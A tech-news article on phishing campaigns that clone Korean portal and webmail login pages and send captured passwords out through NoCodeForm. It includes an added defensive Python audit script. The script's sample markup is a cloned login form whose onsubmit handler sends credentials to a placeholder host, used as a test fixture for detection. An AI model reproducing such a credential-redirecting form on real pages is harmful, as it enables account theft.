Scammers use Korean portals for complex phishing campaigns


Threat actors are using a series of sophisticated phishing attacks mimicking Korean portal websites, logistics and shipping brands, and webmail login pages. These attacks have become increasingly prevalent in recent months, utilising deceptive tactics to trick users into divulging their sensitive account information.

The phishing pages closely resemble authentic websites, making them nearly indistinguishable. Threat actors achieve this level of authenticity by manipulating the source code of the legitimate websites, altering the address and data transmission methods to intercept user IDs and passwords.

Researchers have discovered that the phishing email recipients’ IDs are pre-filled, potentially leading users to unwittingly disclose their passwords. This pre-filled information also gives victims a sense of trust.

One notable technique employed by the threat actors is using NoCodeForm to extract account credentials. NoCodeForm facilitates the transmission of HTML-formatted results through channels like email or Slack. When a user creates an account, a unique form ID is generated, and the holder of that form ID can receive the input values submitted by external users.

“The threat actor also used NoCodeForm to exfiltrate account credentials. NoCodeForm provides a method of transmitting the results in HTML format through the user’s email/Slack. When an account is created, a unique form ID is made. Using this form-id, one can receive the input values of an external user,” the researchers noted.

A comparison of the phishing page on the left and the authentic page on the right. | Source: ASEC

The attackers further modified the onsubmit event handler within the form tag of the genuine website’s source code, redirecting the captured account credentials to the designated NoCodeForm form ID for exfiltration. Researchers’ internal testing confirmed that user-entered account credentials could be collected either through NoCodeForm’s default form or via email/Slack channels controlled by the attackers.
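The following is an added example, not code from the article or from ASEC: a small Python audit that parses a saved login page and reports credential forms whose `action` or `onsubmit` points off the expected host, and whether the ID field is pre-filled. The host `forms.example`, the `send()` handler and the sample markup are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Placeholder form-collection host (an assumption, not from the article).
WATCHED_HOSTS = {"forms.example"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)

# Constructed sample: cloned login form, ID pre-filled, onsubmit rewritten.
SAMPLE = """<form action="/login" onsubmit="return send('https://forms.example/f/FORM-ID')">
<input type="text" name="id" value="user@portal.example">
<input type="password" name="pw"></form>"""

class LoginFormAudit(HTMLParser):
    """Record submit-target URLs, password fields and pre-filled IDs per form."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # A URL can sit in action= or inside the onsubmit handler's script.
            urls = URL_RE.findall(a.get("action", "") + " " + a.get("onsubmit", ""))
            self._cur = {"urls": urls, "password": False, "prefilled": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            kind = a.get("type", "text").lower()
            if kind == "password":
                self._cur["password"] = True
            elif kind in ("text", "email") and a.get("value", "").strip():
                self._cur["prefilled"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit(html, expected_host):
    """Findings for credential forms that send data off the expected host."""
    parser = LoginFormAudit()
    parser.feed(html)
    findings = []
    for form in (f for f in parser.forms if f["password"]):
        for url in form["urls"]:
            host = (urlparse(url).hostname or "").lower()
            if host and host != expected_host and not host.endswith("." + expected_host):
                findings.append({"host": host, "watched": host in WATCHED_HOSTS,
                                 "prefilled_id": form["prefilled"]})
    return findings
```

Calling `audit(SAMPLE, "portal.example")` reports the off-host submit target; a handler that builds its URL at runtime would not be caught by this static check.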

Given the sophisticated nature of the attack and near-identical replication of websites, researchers have urged users to access websites only via standard, trusted methods. In the event of a suspicious login attempt, users are advised to report the matter to the concerned authorities and immediately change the login password as a precautionary measure.

Phishing attacks have increased recently. On April 19, it was reported that LastPass users were targeted via the CryptoChameleon phishing kit. On April 9, reports came out detailing how cybercriminals were deploying VenomRAT via the ScrubCrypt phishing tool. Moreover, on April 4, researchers discovered Agent Tesla phishing campaigns targeting companies in the United States and Australia.

Kumar Hemant

Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
